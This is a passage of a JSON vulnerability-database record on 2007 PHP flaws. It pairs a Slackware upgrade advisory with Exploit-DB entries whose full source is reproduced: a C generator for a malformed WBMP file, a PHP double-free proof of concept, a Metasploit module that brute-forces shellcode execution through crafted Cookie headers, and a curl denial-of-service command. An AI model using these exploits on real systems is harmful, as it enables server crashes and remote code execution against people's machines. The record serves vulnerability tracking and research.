"https://vuxml.freebsd.org/freebsd/f5e52bf5-fc77-11db-8163-000e0c2e438a.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T02:37:11", "bulletinFamily": "unix", "description": "New php packages are available for Slackware 10.2, 11.0, and -current\nto improve the stability and security of PHP. Quite a few bugs were\nfixed -- please see http://www.php.net for a detailed list.\nAll sites that use PHP are encouraged to upgrade. Please note that\nwe haven't tested all PHP applications for backwards compatibility\nwith this new upgrade, so you should have the old package on hand\njust in case.\n\nBoth PHP 4.4.7 and PHP 5.2.2 updates have been provided.\n\n\nHere are the details from the Slackware 11.0 ChangeLog:\n\nextra/php5/php-5.2.2-i486-1_slack11.0.tgz:\n Upgraded to php-5.2.2.\n This fixes bugs and improves security.\n For more details, see:\n http://www.php.net/releases/5_2_2.php\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001\n (* Security fix *)\npatches/packages/php-4.4.7-i486-1_slack11.0.tgz:\n Upgraded to php-4.4.7.\n This fixes bugs and improves security.\n For more details, see:\n http://www.php.net/releases/4_4_7.php\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/php-4.4.7-i486-1_slack10.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/testing/packages/php5/php-5.2.2-i486-1_slack10.2.tgz\n\nUpdated packages for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/php-4.4.7-i486-1_slack11.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.2-i486-1_slack11.0.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-4.4.7-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/extra/php5/php-5.2.2-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 packages:\n56aa46827b63ffbc362727cbaaf586e8 php-4.4.7-i486-1_slack10.2.tgz\nc05e8b71616725493bee7d150b8dc62a php-5.2.2-i486-1_slack10.2.tgz\n\nSlackware 11.0 packages:\nb949d684bd04d1f843c28ee01076d246 php-4.4.7-i486-1_slack11.0.tgz\nb7be5a1e3ef61d1c758513caeda9c7c7 php-5.2.2-i486-1_slack11.0.tgz\n\nSlackware -current packages:\n38a8fe4b7bd5637e09a5a28f50a19a0e php-4.4.7-i486-1.tgz\nb49eb13cc4110617f5515426f747b8d7 php-5.2.2-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n > apachectl stop\n\nNext, upgrade to the new PHP package:\n > upgradepkg php-4.4.7-i486-1_slack11.0.tgz\n\nFinally, restart apache:\n > apachectl start (or: apachectl startssl)", "modified": "2007-05-07T21:22:33", "published": "2007-05-07T21:22:33", "id": "SSA-2007-127-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.470053", "title": "php", "type": "slackware", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T11:12:35", "bulletinFamily": "exploit", "description": "PHP 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities. CVE-2007-1001 . Dos exploit for php platform", "modified": "2007-04-07T00:00:00", "published": "2007-04-07T00:00:00", "id": "EDB-ID:29823", "href": "https://www.exploit-db.com/exploits/29823/", "type": "exploitdb", "title": "PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities", "sourceData": "source: http://www.securityfocus.com/bid/23357/info\r\n\r\nPHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun.\r\n\r\nSuccessfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.\r\n\r\nPHP 5.2.1 and prior versions are vulnerable. \r\n\r\n#define BUFSIZE 1000000\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n int c;\r\n char buf[BUFSIZE];\r\n\r\n FILE *fp = fopen(\"test.wbmp\",\"w\");\r\n\r\n //write header\r\n c = 0;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n\r\n //write width = 2^32 / 4 + 1\r\n c = 0x84;\r\n fputc(c,fp);\r\n c = 0x80;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n c = 0x01;\r\n fputc(c,fp);\r\n\r\n //write height = 4\r\n c = 0x04;\r\n fputc(c,fp);\r\n\r\n //write some data to cause overflow\r\n fwrite(buf,sizeof(buf),1,fp);\r\n\r\n fclose(fp);\r\n}\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29823/"}, {"lastseen": "2016-01-31T18:50:30", "bulletinFamily": "exploit", "description": "PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC. CVE-2007-1711. Dos exploit for linux platform", "modified": "2007-03-27T00:00:00", "published": "2007-03-27T00:00:00", "id": "EDB-ID:3586", "href": "https://www.exploit-db.com/exploits/3586/", "type": "exploitdb", "title": "PHP 4.4.5 / 4.4.6 session_decode Double Free Exploit PoC", "sourceData": "<?php\n ////////////////////////////////////////////////////////////////////////\n // _ _ _ _ ___ _ _ ___ //\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\n // //\n // Proof of concept code from the Hardened-PHP Project //\n // (C) Copyright 2007 Stefan Esser //\n // //\n ////////////////////////////////////////////////////////////////////////\n // PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability //\n ////////////////////////////////////////////////////////////////////////\n\n // This is meant as a protection against remote file inclusion.\n die(\"REMOVE THIS LINE\");\n\n ini_set(\"session.serialize_handler\", \"php\");\n session_start();\n\n $varname = str_repeat(\"D\", 39);\n $$varname = &$_SESSION;\n\n // Trigger the double free\n \n session_decode($varname.'|i:0;');\n $_________________x = \"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ\";\n $_________________a = array(\"OneElement\");\n\n // Now x and a point to the same memory. Therefore x can be used to modify a\n\n // Overwrite pointer to the destructor \n $_________________x[8*4+0] = chr(0x55);\n $_________________x[8*4+1] = chr(0x66);\n $_________________x[8*4+2] = chr(0x77);\n $_________________x[8*4+3] = chr(0x88);\n \n // Trigger the destruction\n unset($_________________a);\n?>\n\n# milw0rm.com [2007-03-27]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3586/"}, {"lastseen": "2016-02-01T11:34:38", "bulletinFamily": "exploit", "description": "PHP < 4.5.0 unserialize Overflow. CVE-2007-1286. Remote exploit for php platform", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "EDB-ID:9939", "href": "https://www.exploit-db.com/exploits/9939/", "type": "exploitdb", "title": "PHP < 4.5.0 - unserialize Overflow", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Brute\r\n\t\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits an integer overflow vulnerability in the unserialize()\r\n\t\t\tfunction of the PHP web server extension. This vulnerability was patched by\r\n\t\t\tStefan in version 4.5.0 and applies all previous versions supporting this function.\r\n\t\t\tThis particular module targets numerous web applications and is based on the proof\r\n\t\t\tof concept provided by Stefan Esser. This vulnerability requires approximately 900k\r\n\t\t\tof data to trigger due the multiple Cookie headers requirement. Since we\r\n\t\t\tare already assuming a fast network connection, we use a 2Mb block of shellcode for\r\n\t\t\tthe brute force, allowing quick exploitation for those with fast networks. \r\n\t\t\t\r\n\t\t\tOne of the neat things about this vulnerability is that on x86 systems, the EDI register points\r\n\t\t\tinto the beginning of the hashtable string. This can be used with an egghunter to\r\n\t\t\tquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\r\n\t\t\tis known. The EDI method is faster, but the bandwidth-intensive brute force used by this\r\n\t\t\tmodule is more reliable across a wider range of systems.\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => \r\n\t\t\t\t[ \r\n\t\t\t\t\t'hdm', # module development\r\n\t\t\t\t\t'GML <grandmasterlogic [at] gmail.com>', # module development and debugging\r\n\t\t\t\t\t'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited\r\n\t\t\t\t], \r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2007-1286'],\r\n\t\t\t\t\t['OSVDB', '32771'],\r\n\t\t\t\t\t['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# 64-bit SuSE: 0x005c0000\r\n\t\t\t\t\t# Backtrack 2.0: 0xb797a000\r\n\t\t\t\t\t# Gentoo: 0xb6900000\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Linux x86 Generic', \r\n\t\t\t\t\t\t{\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\t\t\t\t\t\r\n\t\t\t\t\t[ 'Linux x86 phpBB2', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'phpbb2mysql_data',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpBB2/faq.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpBB/,\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 punBB', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'punbb_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*PunBB/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 WWWThreads', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'forum_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*WWWThreads/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Deadman Redirect', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'authcookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/dmr/dmr.php',\r\n\t\t\t\t\t\t\t'Signature' => /document\\.f\\.userdata\\.focus/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 PhpWebGallery', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'pwg_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpwebgallery/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpwebgallery/msi,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Ariadne-CMS', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'ARCookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/ariadne/loader.php/',\r\n\t\t\t\t\t\t\t'Signature' => /Ariadne is free software/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 ProMA', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'proma',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/proma/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Change Account Information/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t[ 'Linux x86 eGroupware', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'eGW_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/egroupware/login.php',\r\n\t\t\t\t\t\t\t'Signature' => /www.egroupware.org/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\t\t\t\t\t\t\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 04 2007'))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [false, \"The path to vulnerable PHP script\"]),\r\n\t\t\t\t\tOptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\tprint_status(\"Checking for a vulnerable PHP version...\")\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\t\t\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\t\t\t\t\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'GET'\r\n\t\t}, 5)\r\n\t\t\r\n\t\tphp_bug = false\r\n\t\t\r\n\t\tif (not res)\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\t\t\r\n\t\tif (res.code != 200)\r\n\t\t\tprint_status(\"The server returned #{res.code} #{res.message}\")\r\n\t\t\treturn Exploit::CheckCode::Safe\t\r\n\t\tend\r\n\t\t\r\n\t\tif (\r\n\t\t\t(res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or\r\n\t\t\t(res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/)\r\n\t\t )\r\n\t\t \r\n\t\t\tphp_raw = $1\r\n\t\t\tphp_ver = php_raw.split('.')\r\n\r\n\t\t\tif (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)\r\n\t\t\t\tprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\tphp_bug = true\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\treturn Exploit::CheckCode::Safe\t\r\n\t\t\tend\r\n\t\tend\r\n\t\t\r\n\t\t# Detect the phpBB cookie name\r\n\t\tif (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/)\r\n\t\t\tprint_status(\"The server may require a cookie name of '#{$1}_data'\")\r\n\t\tend\r\n\r\n\t\tif(target and target['Signature'])\r\n\t\t\tif (res.body and res.body.match(target['Signature'])) \r\n\t\t\t\tprint_status(\"Detected target #{target.name}\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Did not detect target #{target.name}\")\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\t\treturn php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears\r\n\tend\r\n\r\n\r\n\tdef brute_exploit(target_addrs)\r\n\t\r\n\t\tzvalref = encode_semis('i:0;R:2;')\r\n\r\n#\r\n# Use this if we decide to do 'jmp edi' returns vs brute force\r\n#\r\n=begin\r\n\t\t# Linux specific egg-hunter\r\n\t\ttagger = \"\\x90\\x50\\x90\\x50\"\r\n\t\thunter = \r\n\t\t\t\"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" +\r\n\t\t\t\"\\x3c\\xf2\\x74\\xf1\\xb8\" +\r\n\t\t\ttagger +\r\n\t\t\t\"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\"\r\n\r\n\t\tegghunter = \"\\xcc\" * 39\r\n\t\tegghunter[0, hunter.length] = hunter\r\n\t\t\r\n\t\thashtable = \"\\xcc\" * 39\r\n\t\thashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes\r\n\t\t\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n=end\r\n\r\n\t\t#\r\n\t\t# Just brute-force addresses for now\r\n\t\t# \r\n\t\ttagger = ''\r\n\t\tegghunter = rand_text_alphanumeric(39)\r\n\t\thashtable = rand_text_alphanumeric(39)\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\t\t\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\t\t\r\n\t\t# Generate and reuse the original buffer to save CPU\r\n\t\tif (not @saved_cookies)\r\n\t\t\r\n\t\t\t# Building the malicious request\r\n\t\t\tprint_status(\"Creating the request...\")\r\n\t\t\t\t\r\n\t\t\t# Create the first cookie header to get this started\r\n\t\t\tcookie_fun = \"Cookie: #{cookie_name}=\"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode(\r\n\t\t\t\t'a:100000:{s:8:\"' + \r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\t\t\t\t'\";a:3:{s:12:\"' + \r\n\t\t\t\trand_text_alphanumeric(12) + \r\n\t\t\t\t'\";a:1:{s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";'+\r\n\t\t\t\t'i:0;s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}'\r\n\t\t\t)\r\n\t\t\tcookie_fun << zvalref * 500\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('s:2:\"')\r\n\t\t\tcookie_fun << \"\\r\\n\"\r\n\r\n\t\t\trefcnt = 1000\r\n\t\t\trefmax = 65535\r\n\r\n\t\t\t# Keep adding cookie headers...\r\n\t\t\twhile(refcnt < refmax) \r\n\r\n\t\t\t\tchead = 'Cookie: ';\r\n\t\t\t\tchead << encode_semis('\";N;')\r\n\r\n\t\t\t\t# Stay within the 8192 byte limit\r\n\t\t\t\t0.upto(679) do |i|\r\n\t\t\t\t\tbreak if refcnt >= refmax\r\n\t\t\t\t\trefcnt += 1\r\n\r\n\t\t\t\t\tchead << zvalref\r\n\t\t\t\tend\r\n\t\t\t\tchead << encode_semis('s:2:\"')\r\n\t\t\t\tcookie_fun << chead + \"\\r\\n\"\r\n\t\t\tend\r\n\r\n\t\t\t# The final header, including the hashtable with return address\r\n\t\t\tcookie_fun << \"Cookie: \"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('\";N;')\r\n\t\t\tcookie_fun << zvalref * 500\t\r\n\t\t\t\r\n\t\t\t@saved_cookies = cookie_fun\r\n\t\tend\r\n\r\n\t\t# Generate and reuse the payload to save CPU time\r\n\t\tif (not @saved_payload)\r\n\t\t\t@saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256)\r\n\t\tend\r\n\t\t\r\n\t\tcookie_addrs = Rex::Text.uri_encode(\r\n\t\t\t's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;'\r\n\t\t) + \"\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying address 0x%.8x...\" % target_addrs['Ret'])\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'POST',\r\n\t\t\t'raw_headers' => @saved_cookies + cookie_addrs,\r\n\t\t\t'data' => @saved_payload\r\n\t\t}, 1)\r\n\r\n\t\t\r\n\t\tif res\r\n\t\t\tfailed = false\r\n\t\t\t\r\n\t\t\tprint_status(\"Received a response: #{res.code} #{res.message}\")\r\n\r\n\t\t\tif (res.code != 200)\r\n\t\t\t\tprint_status(\"The server returned a non-200 response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\t\t\t\r\n\t\t\tend\r\n\t\t\t\t\t\t\r\n\t\t\tif (not failed and (res.body and res.body.length > 0))\r\n\t\t\t\tprint_status(\"The server returned a real response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tif (failed)\r\n\t\t\t\tprint_status(\"Please verify the URI and COOKIENAME parameters.\")\r\n\t\t\t\tprint_line('')\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line(res.body)\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line('')\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\traise RuntimeError, \"Exploit settings are probably wrong\"\t\t\t\t\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef encode_semis(str)\r\n\t\tstr.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) }\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9939/"}, {"lastseen": "2016-02-03T10:55:25", "bulletinFamily": "exploit", "description": "PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability. CVE-2007-1285. Dos exploit for php platform", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "EDB-ID:29692", "href": "https://www.exploit-db.com/exploits/29692/", "type": "exploitdb", "title": "PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/22764/info\r\n\r\nPHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.\r\n\r\nThis issue affects all versions of PHP. \r\n\r\n$ php -r 'echo \"a\".str_repeat(\"[]\",200000).\"=1&a=0\";' > postdata\r\n\r\n$ curl http://www.example.com/ -d @postdata\r\n\r\n", "cvss": {"score": 5.0, "vector": 